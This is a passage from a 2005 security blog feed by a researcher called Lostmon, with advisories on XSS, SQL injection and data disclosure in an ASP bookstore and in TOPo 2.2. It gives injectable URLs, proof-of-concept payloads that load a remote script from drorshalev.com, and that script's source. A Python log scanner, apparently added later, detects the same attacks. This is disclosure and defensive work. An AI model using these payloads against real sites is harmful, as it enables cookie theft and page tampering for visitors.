/>http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1<br /><br />http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate='<br /><br />##################<br />AdvancedSearch.asp<br />##################<br /><br />http://[target]/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=111111111&B1=Submit<br /><br /><br />##################<br />ViewItem.asp<br />##################<br /><br />XSS, SQL errors and path disclosure.<br /><br />http://[target]/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565<br /><br />http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here]<br /><br />http://[target]/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565<br /><br />http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION]<br /><br /><br /><br />####################<br />STWShowContent.asp<br />####################<br />XSS, SQL errors and path disclosure.<br /><br /><br />http://[target]/store/STWShowContent.asp?idRightPage=13032[XSS-CODE]<br /><br />http://[target]/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION]<br /><br />http://[target]/store/STWShowContent.asp<br /><br />###################<br />MySide.Asp<br />###################<br />XSS, SQL errors and path disclosure.<br /><br /><br />http://[target]/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]<br /><br />http://[target]/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles<br /><br />#################<br />BrowseMain.asp<br />#################<br />XSS, SQL errors and path disclosure.<br /><br />http://[target]/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4<br /><br />http://[target]/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4<br /><br />http://[target]/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4<br /><br />http://[target]/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br /><br />################<br />others<br />################<br />XSS<br /><br />http://[target]/store/NewCustomer.asp?newemail=zzzz@lalala.es&RedirectURL=[XSS-CODE]<br /><br />http://[target]/store/Login.asp?RedirectURL=[XSS-code]<br /><br />It is also possible to inject SQL or XSS code into the 'Cat0'<br />or 'Cat1' variable in all files where these variables are used.<br /><br />It is also possible to inject XSS code into the 'Cat0Literal'<br />or 'Cat1Literal' variable in all files where these variables are used.<br /><br />################### End ################<br /><br />thnx to estrella for being my light<br />Thnx to icaro, he is my Shadow !!!<br />thnx to all the http://www.osvdb.org Team<br />thnx to all who day after day support me !!!<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Data Mangler of: http://www.osvdb.org<br />--<br />Curiosity is what moves the mind<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1116720492493765462005-05-21T17:05:00.000-07:002005-05-21T17:08:46.253-07:00A thought...It may be that it is not such a good idea to share what one knows.<br />The crude reality, unfortunately, often surpasses fiction...<br /><br />:X<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1116508718588706252005-05-20T08:17:00.000-07:002005-05-21T03:11:10.883-07:00TOPo 2.2 multiple variable & fields XSS and information disclosure#######################################################<br />TOPo 2.2 multiple variable & fields XSS and information disclosure<br />vendor url: http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info<br />advisory: http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html<br />vendor notified: yes exploit available: yes.<br />OSVDB ID: <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=16699" target="_BLANK">16699</a> and <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=16700" target="_BLANK">16700</a><br />secunia: <a href="http://secunia.com/advisories/15325/" target="_BLANK">SA15325</a><br />Securitytracker: <a href="http://securitytracker.com/id?1014016" target="_BLANK">1014016</a><br />BID: <a href="http://securityfocus.com/bid/13700" target="_BLANK">13700</a> and <a href="http://securityfocus.com/bid/13701" target="_BLANK">13701</a><br />#######################################################<br /><br />TOPo is a free TOP (ranking) system written in PHP that works<br />without a MySQL database. TOPo is specially designed for<br />web sites hosted on web servers that do not offer<br />quality MySQL support.<br /><br />TOPo contains a flaw that allows a remote cross site<br />scripting attack. This flaw exists because the application<br />does not validate the 'm', 's', 'ID', 't' and possibly other parameters<br />upon submission to the 'index.php' script. This could allow a user<br />to create a specially crafted URL that would execute arbitrary<br />code in a user's browser within the trust relationship between<br />the browser and the server, leading to a loss of integrity.<br /><br />TOPo also contains an information disclosure flaw. All data is stored<br />in the '/data/' folder, and the *.dat files there hold all votes, comments<br />and other information about the sites in the top. Any user can download<br />these files and obtain the IP address of every client who voted or added a comment.<br /><br />################<br />software used:<br />################<br /><br />Microsoft Windows 2000 [Version 5.00.2195] all fixes.<br />Internet explorer 6.0 sp1 all fixes.<br />Netcraft toolbar 1.5.6 (detects all the XSS attacks in this case :D)<br />Google toolbar 2.0.114.9-big/es<br /><br />###########<br />versions:<br />###########<br /><br />TOPo v2.2.178 vulnerable.<br /><br />##############<br />solution<br />##############<br /><br />no solution was available at this time.<br /><br />############<br />time line<br />############<br /><br />discovered: 13 may 2005<br />vendor notify: 19 may 2005<br />vendor response:<br />vendor fix:<br />disclosure: 20 may 2005<br /><br />######################<br />Proof of concept XSS<br />######################<br /><br />http://[victim]/topo/index.php?m=top"&gt;&lt;SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js&gt;&lt;/script&gt;&s=info&ID=1114815037.2498<br /><br />http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552"&gt;&lt;SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js&gt;&lt;/SCRIPT&gt;&t=puntuar<br /><br />http://[victim]/topo/index.php?m=top&s=info"&gt;&lt;script&gt;alert()&lt;/script&gt;&ID=1115946293.3552&t=puntuar<br /><br />http://[victim]/topo/index.php?m=top"&gt;&lt;script&gt;alert()&lt;/script&gt;&s=info&ID=1115946293.3552&t=puntuar<br /><br />http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498"&gt;&lt;SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js&gt;&lt;/script&gt;<br /><br />http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598"&gt;&lt;SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js&gt;&lt;/script&gt;<br /><br />http://[victim]/topo/index.php?m=members&s=html&t=edit"&gt;&lt;SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js&gt;&lt;/script&gt;<br /><br />#########################<br /><br />When trying to add a new comment, some fields are vulnerable<br />to XSS-style attacks.<br /><br />http://[victim]/top/index.php?m=top&s=info&t=comments&paso=1&ID=1115946293.3552<br /><br />The 'name', 'your web' and 'your email' fields are vulnerable.<br /><br />##################<br />example of js.js<br />##################<br /><br />Thnx to http://www.drorshalev.com for this script and for hosting it<br />for this demonstration.<br /><br />#################<br />js.js<br />#################<br /><br />function showIt(){<br />document.body.innerHTML="&lt;a href='javascript:alert(document.cookie)'&gt;&lt;center&gt;&lt;b&gt;Your PC Can be hacked Via "+ document.domain +" XSS ,Html Injection to a Web Site"+document.domain +" By DrorShalev.com&lt;br&gt;&lt;/b&gt;&lt;br&gt;&lt;img border=0 src='http://sec.drorshalev.com/dev/injection/lig.gif' width=60 HEIGHT=60&gt;&lt;img src='http://www.drorshalev.com/dev/injection/gif.jpg.asp' border=1&gt;&lt;br&gt;&lt;/center&gt;&lt;/a&gt;"+ document.body.innerHTML;<br />window.status="Your PC Can be hacked Via "+ document.domain +" XSS ,Html Injection to a Web Site "+document.domain +" By DrorShalev.com";<br />setTimeout("window.open('view-source:http://sec.drorshalev.com/dev/injection/xss.txt')",6000);<br />}<br />setTimeout("showIt()",2000);<br /><br />################<br />data disclosure<br />################<br /><br />http://[victim]/data/<br /><br />################ EnD #####################<br /><br />thnx to estrella for being my light<br />thnx to all the http://www.osvdb.org Team<br />Thnx to http://www.drorshalev.com and dror<br />for his script and for hosting it !!!!<br />thnx to all who day after day support me !!!<br /><br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Data Mangler of: http://www.osvdb.org<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.com
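As an added defender-side example (not code from either advisory, nor from the STW or TOPo vendors), this Python scans combined-format access logs for the request shapes the two advisories above describe: markup characters in the STW and TOPo parameters that are reflected unencoded, non-integer values in the STW parameters that reach SQL, and direct reads of the TOPo /data/ folder. The log lines, client addresses and the votes.dat file name are constructed for the demo.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit
# Parameter and script names come from the two advisories (lower-cased here).
STW_REFLECTED = {"cat0", "cat0literal", "cat1", "cat1literal", "strsearch",   # reflected unencoded (XSS)
                 "instock", "searchcat1", "searchcat2", "pricemin", "pricemax",
                 "publicationdate", "isbn", "idrightpage", "redirecturl"}
STW_NUMERIC = {"cat0", "cat1", "isbn", "idrightpage", "searchtype",           # integers passed straight to SQL
               "searchcat1", "searchcat2", "publicationdate"}
TOPO_REFLECTED = {"m", "s", "id", "t"}                 # TOPo index.php parameters, reflected (XSS)
XSS_RE = re.compile(r'[<>"]|javascript:', re.I)        # markup break-out markers
DAT_RE = re.compile(r"/data/(?:[^/?]*\.dat)?$", re.I)  # TOPo data folder or a *.dat file in it
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/')

def classify(target):
    """Tag one request target (path + query) with the advisory patterns it matches."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    findings = []
    if DAT_RE.search(path):            # direct read of TOPo vote/comment data
        findings.append("topo-data-disclosure")
    reflected = TOPO_REFLECTED if path.endswith("/index.php") else STW_REFLECTED
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)         # second decode catches %2522-style double encoding
        key = name.lower()
        if key in STW_NUMERIC and not re.fullmatch(r"-?\d*", value):
            findings.append(f"sqli-probe:{name}")   # quote or text where only an integer belongs
        if key in reflected and XSS_RE.search(value):
            findings.append(f"xss:{name}")
    return findings

def scan_log(lines):
    """Return (client_ip, target, findings) for every combined-format line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (findings := classify(m.group(2))):
            hits.append((m.group(1), m.group(2), findings))
    return hits
# Constructed sample lines (not real traffic): a benign STW request, the XSS and
# SQL shapes from the STW advisory, then a direct read of a TOPo .dat file.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/May/2005:05:15:00 -0700] "GET /store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible HTTP/1.1" 200 4321',
    '203.0.113.5 - - [24/May/2005:05:15:03 -0700] "GET /store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts%22%3E%3Cscript%3Ealert(1)%3C/script%3E&Cat1=839&Cat1Literal=Bible HTTP/1.1" 200 4400',
    '198.51.100.7 - - [24/May/2005:05:16:10 -0700] "GET /store/ViewItem.asp?ISBN=0789906651%27&Cat0=565 HTTP/1.1" 500 812',
    '198.51.100.7 - - [20/May/2005:08:17:00 -0700] "GET /topo/data/votes.dat HTTP/1.0" 200 1023',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, findings, target)
```

The numeric allowlist check is stricter than a quote-character blocklist: any non-integer value in a field the application uses as an ID is worth a look, whether or not it contains a quote.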